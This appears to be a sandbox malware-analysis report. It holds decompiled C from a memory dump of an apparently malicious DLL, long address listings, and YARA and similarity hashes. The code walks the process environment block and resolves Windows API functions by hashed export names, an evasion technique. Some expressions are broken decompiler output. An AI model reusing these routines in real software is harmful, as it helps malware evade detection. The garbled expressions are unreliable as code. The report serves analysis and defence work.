					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}






































































                                                                                                        0x1001934f
                                                                                                        0x10019353
                                                                                                        0x1001935f
                                                                                                        0x10019363
                                                                                                        0x10019367
                                                                                                        0x1001936c
                                                                                                        0x1001936f
                                                                                                        0x10019371
                                                                                                        0x10019373
                                                                                                        0x10019373
                                                                                                        0x10019376
                                                                                                        0x1001937c
                                                                                                        0x100193f4
                                                                                                        0x100193f8
                                                                                                        0x100193fb
                                                                                                        0x100193fb
                                                                                                        0x100193fe
                                                                                                        0x00000000
                                                                                                        0x100193fe
                                                                                                        0x10019383
                                                                                                        0x100193eb
                                                                                                        0x100193ef
                                                                                                        0x00000000
                                                                                                        0x100193ef
                                                                                                        0x1001938a
                                                                                                        0x100193e3
                                                                                                        0x100193e6
                                                                                                        0x00000000
                                                                                                        0x100193e6
                                                                                                        0x1001938f
                                                                                                        0x100193cd
                                                                                                        0x100193d4
                                                                                                        0x100193d7
                                                                                                        0x100193a0
                                                                                                        0x100193a0
                                                                                                        0x100193a6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100193ab
                                                                                                        0x100193c5
                                                                                                        0x100193c8
                                                                                                        0x00000000
                                                                                                        0x100193c8
                                                                                                        0x100193b0
                                                                                                        0x00000000
                                                                                                        0x100193b2
                                                                                                        0x100193b6
                                                                                                        0x100193b9
                                                                                                        0x00000000
                                                                                                        0x100193b9
                                                                                                        0x100193b0
                                                                                                        0x10019401
                                                                                                        0x10019401
                                                                                                        0x10019401
                                                                                                        0x1001940a
                                                                                                        0x10019413
                                                                                                        0x10019416
                                                                                                        0x10019419
                                                                                                        0x1001941c
                                                                                                        0x1001941f
                                                                                                        0x10019425
                                                                                                        0x10019467
                                                                                                        0x1001946a
                                                                                                        0x1001946b
                                                                                                        0x10019472
                                                                                                        0x10019475
                                                                                                        0x10019427
                                                                                                        0x1001942b
                                                                                                        0x10019435
                                                                                                        0x1001943c
                                                                                                        0x1001943e
                                                                                                        0x10019457
                                                                                                        0x1001945a
                                                                                                        0x1001945a
                                                                                                        0x1001943c
                                                                                                        0x1001947d
                                                                                                        0x10019480
                                                                                                        0x10019483
                                                                                                        0x10019487
                                                                                                        0x1001948b
                                                                                                        0x10019495
                                                                                                        0x10019499
                                                                                                        0x100194a3
                                                                                                        0x100194ac
                                                                                                        0x100194b9
                                                                                                        0x100194bc
                                                                                                        0x100194bf
                                                                                                        0x100194bf
                                                                                                        0x100194cb
                                                                                                        0x100194d6
                                                                                                        0x100194dc
                                                                                                        0x100194e0
                                                                                                        0x100194cd
                                                                                                        0x100194cd
                                                                                                        0x100194cd
                                                                                                        0x100194e8
                                                                                                        0x10019512
                                                                                                        0x10019518
                                                                                                        0x10019518
                                                                                                        0x10019520
                                                                                                        0x100198c9
                                                                                                        0x100198cf
                                                                                                        0x100198d5
                                                                                                        0x100198d5
                                                                                                        0x00000000
                                                                                                        0x10019526
                                                                                                        0x10019526
                                                                                                        0x1001952a
                                                                                                        0x1001952d
                                                                                                        0x10019530
                                                                                                        0x10019533
                                                                                                        0x10019537
                                                                                                        0x10019539
                                                                                                        0x1001953c
                                                                                                        0x1001953f
                                                                                                        0x10019543
                                                                                                        0x10019548
                                                                                                        0x1001954b
                                                                                                        0x1001954f
                                                                                                        0x10019554
                                                                                                        0x10019557
                                                                                                        0x10019559
                                                                                                        0x1001955c
                                                                                                        0x10019560
                                                                                                        0x10019565
                                                                                                        0x10019575
                                                                                                        0x1001957b
                                                                                                        0x1001957b
                                                                                                        0x10019583
                                                                                                        0x10019585
                                                                                                        0x1001958e
                                                                                                        0x10019590
                                                                                                        0x10019593
                                                                                                        0x1001959e
                                                                                                        0x100195cb
                                                                                                        0x100195a0
                                                                                                        0x100195b7
                                                                                                        0x100195b7
                                                                                                        0x100195d3
                                                                                                        0x100195d9
                                                                                                        0x100195df
                                                                                                        0x100195df
                                                                                                        0x100195d3
                                                                                                        0x1001958e
                                                                                                        0x100195e6
                                                                                                        0x10019657
                                                                                                        0x1001965c
                                                                                                        0x100196b5
                                                                                                        0x10019777
                                                                                                        0x1001977c
                                                                                                        0x1001978b
                                                                                                        0x10019791
                                                                                                        0x10019795
                                                                                                        0x1001979e
                                                                                                        0x100197a5
                                                                                                        0x100197ae
                                                                                                        0x100197bc
                                                                                                        0x100197bf
                                                                                                        0x100197a7
                                                                                                        0x100197a7
                                                                                                        0x100197a7
                                                                                                        0x100197a5
                                                                                                        0x100197c8
                                                                                                        0x100197f5
                                                                                                        0x10019808
                                                                                                        0x10019810
                                                                                                        0x100197f7
                                                                                                        0x100197f9
                                                                                                        0x10019801
                                                                                                        0x10019801
                                                                                                        0x100197ca
                                                                                                        0x100197cf
                                                                                                        0x100197ee
                                                                                                        0x100197d1
                                                                                                        0x100197d6
                                                                                                        0x100197e7
                                                                                                        0x100197d8
                                                                                                        0x100197d8
                                                                                                        0x100197d8
                                                                                                        0x100197d6
                                                                                                        0x100197cf
                                                                                                        0x10019818
                                                                                                        0x10019827
                                                                                                        0x10019834
                                                                                                        0x1001983d
                                                                                                        0x10019841
                                                                                                        0x10019845
                                                                                                        0x10019848
                                                                                                        0x1001984b
                                                                                                        0x1001984e
                                                                                                        0x10019851
                                                                                                        0x10019854
                                                                                                        0x1001985a
                                                                                                        0x1001985e
                                                                                                        0x10019864
                                                                                                        0x10019864
                                                                                                        0x1001985a
                                                                                                        0x1001986a
                                                                                                        0x100198a7
                                                                                                        0x100198ab
                                                                                                        0x100198b2
                                                                                                        0x100198b8
                                                                                                        0x1001986c
                                                                                                        0x1001986f
                                                                                                        0x1001988f
                                                                                                        0x10019893
                                                                                                        0x1001989a
                                                                                                        0x100198a1
                                                                                                        0x10019871
                                                                                                        0x10019874
                                                                                                        0x10019876
                                                                                                        0x1001987a
                                                                                                        0x10019884
                                                                                                        0x1001988a
                                                                                                        0x1001988a
                                                                                                        0x10019874
                                                                                                        0x1001986f
                                                                                                        0x100198bf
                                                                                                        0x100198bf
                                                                                                        0x100198d8
                                                                                                        0x100198d8
                                                                                                        0x100198de
                                                                                                        0x100198e3
                                                                                                        0x1001993d
                                                                                                        0x10019942
                                                                                                        0x10019981
                                                                                                        0x10019986
                                                                                                        0x10019988
                                                                                                        0x1001998c
                                                                                                        0x1001998f
                                                                                                        0x10019992
                                                                                                        0x10019994
                                                                                                        0x10019995
                                                                                                        0x10019995
                                                                                                        0x1001999a
                                                                                                        0x100199b8
                                                                                                        0x100199ba
                                                                                                        0x100199be
                                                                                                        0x100199c4
                                                                                                        0x100199c7
                                                                                                        0x100199c9
                                                                                                        0x100199ca
                                                                                                        0x100199ca
                                                                                                        0x00000000
                                                                                                        0x1001999c
                                                                                                        0x1001999c
                                                                                                        0x1001999c
                                                                                                        0x100199a0
                                                                                                        0x100199a6
                                                                                                        0x100199a9
                                                                                                        0x100199ab
                                                                                                        0x100199ae
                                                                                                        0x100199cd
                                                                                                        0x100199cd
                                                                                                        0x100199d4
                                                                                                        0x100199ee
                                                                                                        0x100199d6
                                                                                                        0x100199d6
                                                                                                        0x100199e2
                                                                                                        0x100199e3
                                                                                                        0x100199e6
                                                                                                        0x100199e6
                                                                                                        0x100199fc
                                                                                                        0x100199fc
                                                                                                        0x1001999a
                                                                                                        0x10019947
                                                                                                        0x10019955
                                                                                                        0x1001996d
                                                                                                        0x10019971
                                                                                                        0x10019974
                                                                                                        0x1001997a
                                                                                                        0x1001997e
                                                                                                        0x1001997e
                                                                                                        0x00000000
                                                                                                        0x1001997e
                                                                                                        0x10019957
                                                                                                        0x1001995b
                                                                                                        0x10019961
                                                                                                        0x10019961
                                                                                                        0x10019967
                                                                                                        0x00000000
                                                                                                        0x10019967
                                                                                                        0x10019949
                                                                                                        0x1001994d
                                                                                                        0x00000000
                                                                                                        0x1001994d
                                                                                                        0x100198e7
                                                                                                        0x10019913
                                                                                                        0x1001992b
                                                                                                        0x1001992f
                                                                                                        0x10019932
                                                                                                        0x10019935
                                                                                                        0x10019937
                                                                                                        0x1001993a
                                                                                                        0x10019915
                                                                                                        0x10019915
                                                                                                        0x10019919
                                                                                                        0x1001991c
                                                                                                        0x1001991f
                                                                                                        0x10019922
                                                                                                        0x10019925
                                                                                                        0x10019925
                                                                                                        0x00000000
                                                                                                        0x10019913
                                                                                                        0x100198ed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100198f3
                                                                                                        0x100198f7
                                                                                                        0x100198fd
                                                                                                        0x10019900
                                                                                                        0x10019903
                                                                                                        0x10019906
                                                                                                        0x00000000
                                                                                                        0x10019906
                                                                                                        0x1001977e
                                                                                                        0x10019782
                                                                                                        0x10019788
                                                                                                        0x00000000
                                                                                                        0x10019788
                                                                                                        0x100196c0
                                                                                                        0x100196d2
                                                                                                        0x100196d7
                                                                                                        0x10019742
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019749
                                                                                                        0x1001976f
                                                                                                        0x10019773
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019752
                                                                                                        0x10019757
                                                                                                        0x1001976b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001976d
                                                                                                        0x1001975e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019763
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019765
                                                                                                        0x00000000
                                                                                                        0x10019749
                                                                                                        0x100196d9
                                                                                                        0x100196e3
                                                                                                        0x100196f4
                                                                                                        0x100196f7
                                                                                                        0x100196fa
                                                                                                        0x10019700
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019706
                                                                                                        0x10019706
                                                                                                        0x10019706
                                                                                                        0x1001970d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001970f
                                                                                                        0x10019712
                                                                                                        0x10019718
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001971a
                                                                                                        0x1001971c
                                                                                                        0x10019725
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019739
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001973b
                                                                                                        0x100196c7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100196cd
                                                                                                        0x10019661
                                                                                                        0x10019690
                                                                                                        0x10019691
                                                                                                        0x1001969a
                                                                                                        0x00000000
                                                                                                        0x100196ab
                                                                                                        0x00000000
                                                                                                        0x100196ab
                                                                                                        0x10019668
                                                                                                        0x1001966b
                                                                                                        0x1001967e
                                                                                                        0x1001967f
                                                                                                        0x10019683
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001966b
                                                                                                        0x10019661
                                                                                                        0x100195ed
                                                                                                        0x1001964a
                                                                                                        0x1001964e
                                                                                                        0x10019654
                                                                                                        0x00000000
                                                                                                        0x10019654
                                                                                                        0x100195ef
                                                                                                        0x100195f3
                                                                                                        0x10019600
                                                                                                        0x10019604
                                                                                                        0x1001961a
                                                                                                        0x10019622
                                                                                                        0x10019606
                                                                                                        0x10019608
                                                                                                        0x10019612
                                                                                                        0x10019612
                                                                                                        0x10019628
                                                                                                        0x10019631
                                                                                                        0x10019648
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019648
                                                                                                        0x10019633
                                                                                                        0x10019633
                                                                                                        0x00000000
                                                                                                        0x10019628

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
                                                                                                        • Instruction ID: 40addf1f47f77ce90969db43eb15dc0c4582e7f707f2120123862ccb300b72ca
                                                                                                        • Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
                                                                                                        • Instruction Fuzzy Hash: A922893080C7998BE729CF15C49136ABBE0FF86340F14886EE9D65F291D335DA85DB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10011460, Relevance: .6, Instructions: 572COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E10011460(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E10010328(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x1001d208 == 0 ||  *0x1001d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x7af3da47;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E10014FD4( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x1001d2ec |  *0x1001d2ed;
									if(( *0x1001d2ec |  *0x1001d2ed) == 0) {
										_t525 =  *0x1001d208; // 0x9cab0a6e
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x1001d2ec = 1;
											_t526 = E100135F4(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E10011C54(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x1001d208 = _t526;
											 *0x1001d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E100135F4(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E10011C54(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E1000DFF8(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E1000DFF8(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x82fffbdc;
									if(_t535[0x54] == 0x82fffbdc) {
										 *0x1001d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0xdb278333;
										if(_t535[0x54] == 0xdb278333) {
											 *0x1001d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E1000E8D4( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E10013044(0xfe338407, 0xccbfc9a9, 0xfe338407, 0xfe338407);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x1001d2e4 = 1;
					E1000F5A8( &(_t535[0x38]), 0);
					E1000F5A8( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E1000F4E0( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E10013044(0xfe338407, 0x790529cb, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E1000F84C( &(_t535[0xc]), E1000F4F0( &(_t535[8])) + 0x14);
								_t369 = E1000F4E0( &(_t535[0xc]), E1000F4F0( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E1000F678( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E1000F5A8( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E1000F678( &(_t535[8]));
